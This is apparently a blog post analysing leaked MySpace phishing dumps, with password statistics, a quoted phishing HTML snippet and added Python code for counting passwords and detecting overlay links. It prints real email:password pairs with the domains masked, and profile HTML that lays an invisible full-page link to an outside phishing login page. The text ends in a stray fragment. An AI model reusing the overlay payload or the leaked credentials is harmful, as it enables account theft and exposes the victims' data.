Abstract
Today I found an interesting article on SecuriTeam, Myspace phishing site discloses countless usernames and passwords. Someone must have found the user/password combo file collected by a phisher. It is a collection of ~57’000 user/pass (actually email/pass) combos. Some of them will be fake, but anyway, I got interested in the whole story. After some research I found the original advisory on FullDisclosure (which by the way also includes the passdump). I also Googled around a bit and found 3 more files with the name “myspace.txt”. This short analysis is based on these 4 passdumps. I really like to play with real data 🙂
The files
| File | Size (bytes) | Lines | Unique lines | Comment |
| --- | --- | --- | --- | --- |
| m0 | 1886347 | 56590 | 42575 | Original file from the advisory |
| m1 | 1405905 | 45325 | 43098 | found with Google |
| m2 | 1527730 | 48892 | 46664 | found with Google |
| m3 | 1527769 | 48900 | 46664 | found with Google |
People and phishing
Some people realized that they are going to be phished 🙂
```
fuck.off.seriousy:computergek
you really really suck:fuckoffthisissomethingadickwoulddo
youguyssuck@fuckoff.com:getalifeubastard
fuckyou@fuckoff.com:diephisher
lollol
```
Others don’t. They actually tried to log in many times (the number before the combo is the number of login attempts):

```
[system@nord myspace]# sort * | uniq -c | sort -n | tail -n 30
     18 amandamyspace_email@xxxx.com:josh2202
     18 blndygrl82@xxxxxx.com:luvyachris
     18 dncrj629@xxxxxxxx.net:julie
     18 dtonesuperstarr@xxxxxxxx.com:carla09
     18 eathenallen@xxx.com:candisma3
     18 haleytrash@xxxxxx.com:buttcrack.
     18 iamtyler44@xxxxxx.com:tjh123
     18 katyandjan@xxxxxxx.net:meeow1
     18 latinagirlveronica@xxxxx.com:teddy123
     18 molly_doglover@xx.com:1007404mkk
     20 alicewang93@xxxxxxxxxx.com:puppies11
     21 b_radschenk@xxxxx.com:ford08
     21 gogirl55546@xxxxxx.com:emmakauf!
     21 helenichero617@xxx.com:christian
     21 larissapasifull@xxxxxxx.com:16188s
     21 soccergirlbay94@xxxxxxxx.com:1020064evaandalways
     21 yellowducks4you@xxx.net:norton13
     22 zjs1daddy@xxxxx.com:freeshit4me
     23 jbacaphoto@xxxxxxxxx.net:tiger2
     23 twisted_and_frayed@xxxxxx.com:danny12031986
     24 cathysurmick@xxxx.com:travis13
     24 rlsorey@xx.com:abc123
     24 the_beast525@xxxx.com:zander1
     24 typ.1985@xxxxxxx.com:Mikhail
     27 amandapandapixie@xx.com:panda1
     36 aaron.braesicke@xxxxxx.net:dragon1
     40 prissykatie2@xxxxx.com:swimmer1
     45 southpark1@xxxxxxx.com:ajizzle!
    262 
    437 :
[system@nord myspace]#
```
Password quality
The 30 most used passwords
from the original list m0:
```
[system@nord myspace]# sort m0 | uniq | awk -F: '{ print $2}' | sort | uniq -c | sort -n | tail -n 30
     13 love123
     13 michael1
     13 password2
     14 asshole
     14 bitch
     14 fuck you
     14 iloveyou
     14 jordan1
     14 qwerty1
     15 123456a
     15 babygirl1
     15 blink182
     15 bubbles1
     15 princess1
     16 123abc
     16 iloveyou2
     17 123456
     17 nicole1
     18 football1
     18 number1
     21 password
     22 i
     24 fuckyou1
     24 myspace1
     28 iloveyou1
     29 monkey1
     34 fuckyou
     56 abc123
     75 password1
    981 
[system@nord myspace]#
```
Password length
But if we look at the 20-character passwords, you will see that these aren’t actually passwords:

```
duanne1105duanne1105
youreastupidjerkface
ieatshitforbreakfest
1andrewlennon@yahcgg
fishyp@sbcglobal.net
suck my dick, pricks
fuckinhackersgo2hell
nice try you asshole
ILLHACKYOURMOMSPUSSY
suckmycockits9inches
worthlesspieceofshit
m loged in you bitch
URADUMBFUKKHAKKERHAH
Coopsieee3Coopsieee3
u suck i aint stupid
heymrhackerurafaggot
fuck you hack wanker
jfduoa932p[1rguinfkl
kaykay1211loserific1
stfu and get a life.
this is fake dipshit
fuck you and yo mama
mind ya own business
youmustthinkimstupid
```
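The shell pipelines above can be reproduced and extended in a few lines of Python. This is an added example, not code from the original post: it parses combo lines, counts how often each combo was submitted, ranks passwords after de-duplicating combos (so one user retrying does not inflate a password's count), and flags long entries containing spaces as probable messages to the phisher rather than passwords. The sample dump is constructed and the addresses are fictitious.

```python
import re
from collections import Counter

# Constructed sample in the "email:password" format of the myspace.txt dumps;
# addresses are fictitious, domains masked the way the post masks them.
SAMPLE_DUMP = """\
alice@xxxx.com:password1
alice@xxxx.com:password1
alice@xxxx.com:password1
bob@xxx.net:abc123
carol@xxxxx.com:abc123
dave@xx.com:mind ya own business
erin@xxxxxx.com:monkey1
bob@xxx.net:abc123
:
"""

LINE_RE = re.compile(r"^([^:]*):(.*)$")


def parse_dump(text):
    """Split the dump into (email, password) pairs; blank and bare ':' lines are dropped."""
    pairs = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and m.group(1):
            pairs.append((m.group(1), m.group(2)))
    return pairs


def login_attempts(pairs):
    """Like `sort | uniq -c`: how many times each combo was submitted to the phishing form."""
    return Counter(pairs)


def top_passwords(pairs, n=30):
    """Like `sort | uniq | awk -F: '{print $2}' | sort | uniq -c | sort -n | tail -n N`:
    combos are de-duplicated first so a retrying user does not inflate a password's count."""
    return Counter(pw for _, pw in set(pairs)).most_common(n)


def length_histogram(pairs):
    """Password length distribution over unique combos."""
    return Counter(len(pw) for _, pw in set(pairs))


def probable_messages(pairs, min_len=20):
    """Long entries containing spaces are usually messages typed at the phisher, not secrets."""
    return sorted({pw for _, pw in pairs if len(pw) >= min_len and " " in pw})
```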
How the Phisher did it
- from Waldo
Hmm… Oh no, it is very easy, yes very easy what he is doing. He left some traces on some of the “cracked” accounts. I was expecting somebody to comment earlier, since it’s been a couple of hours since the initial post.
When you modify a profile you can add this to the data of the profile, you know, those HTML customizations. I found this on one of the accounts that really got my attention a little bit more than the girl of the account 😛

```html
HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="http://marcolano.com/login/">
  <img style="border-width:0px;width:2024px; height:1768px;" src="http://x.myspace.com/images/clear.gif">
</a>
<a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="http://marcolano.com/login/">
  <img style="border-width:0px;width:2024px; height:1768px;" src="http://x.myspace.com/images/clear.gif">
</a>
<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://www.../mov/cid_3277_f.mov" width="1" height="1">
```

As you might see, this creates a huge invisible link in the page in front of everything, so when you click on anything on the page, like a link or anything, it will take you to that phishing website, so people believe that the account expired and enter their user+pass. Now I believe that his message was a way to tell about a BUG in myspace that should filter that content and is not doing it. So… we are in fact not talking about a stupid phishing website, for those who still believe that.
Regards Waldo
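As an added example (not part of the post or of Waldo’s comment), the following Python filter implements the kind of check Waldo says myspace should have applied to profile HTML: it flags absolutely positioned links to off-site hosts that wrap an image large enough to cover the page. SITE_HOSTS and the 1000px threshold are assumptions; the sample is constructed from the quoted snippet.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts a profile may legitimately link to without being flagged.
SITE_HOSTS = {"myspace.com", "www.myspace.com", "x.myspace.com"}
# Matches width/height declarations but not e.g. border-width (lookbehind).
PX_RE = re.compile(r"(?<![\w-])(width|height)\s*:\s*(\d+)px", re.I)
# Constructed from the quoted snippet: a positioned off-site link around a page-sized image.
PHISH_SAMPLE = (
    'HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;" '
    'href="http://marcolano.com/login/"> <img style="border-width:0px;width:2024px; '
    'height:1768px;" src="http://x.myspace.com/images/clear.gif"> </a>'
)


class OverlayLinkFinder(HTMLParser):
    """Flags <a> elements that are absolutely positioned, point off-site and wrap
    an <img> big enough to cover the page (the invisible full-page link above)."""

    def __init__(self, min_px=1000):
        super().__init__()
        self.min_px = min_px
        self.findings = []
        self._open_links = []  # (href, absolute, off_site) for each open <a>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = (a.get("style") or "").lower().replace(" ", "")
        if tag == "a":
            href = a.get("href") or ""
            host = urlparse(href).hostname or ""
            self._open_links.append((href, "position:absolute" in style,
                                     bool(host) and host not in SITE_HOSTS))
        elif tag == "img" and self._open_links:
            dims = {k: int(v) for k, v in PX_RE.findall(style)}
            href, absolute, off_site = self._open_links[-1]
            covers_page = min(dims.get("width", 0), dims.get("height", 0)) >= self.min_px
            if absolute and off_site and covers_page:
                self.findings.append(href)

    def handle_endtag(self, tag):
        if tag == "a" and self._open_links:
            self._open_links.pop()


def find_overlay_links(profile_html):
    """Return hrefs of page-covering invisible links found in user-supplied profile HTML."""
    finder = OverlayLinkFinder()
    finder.feed(profile_html)
    finder.close()
    return finder.findings
```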
- and KF enhances:
nameHREFTrack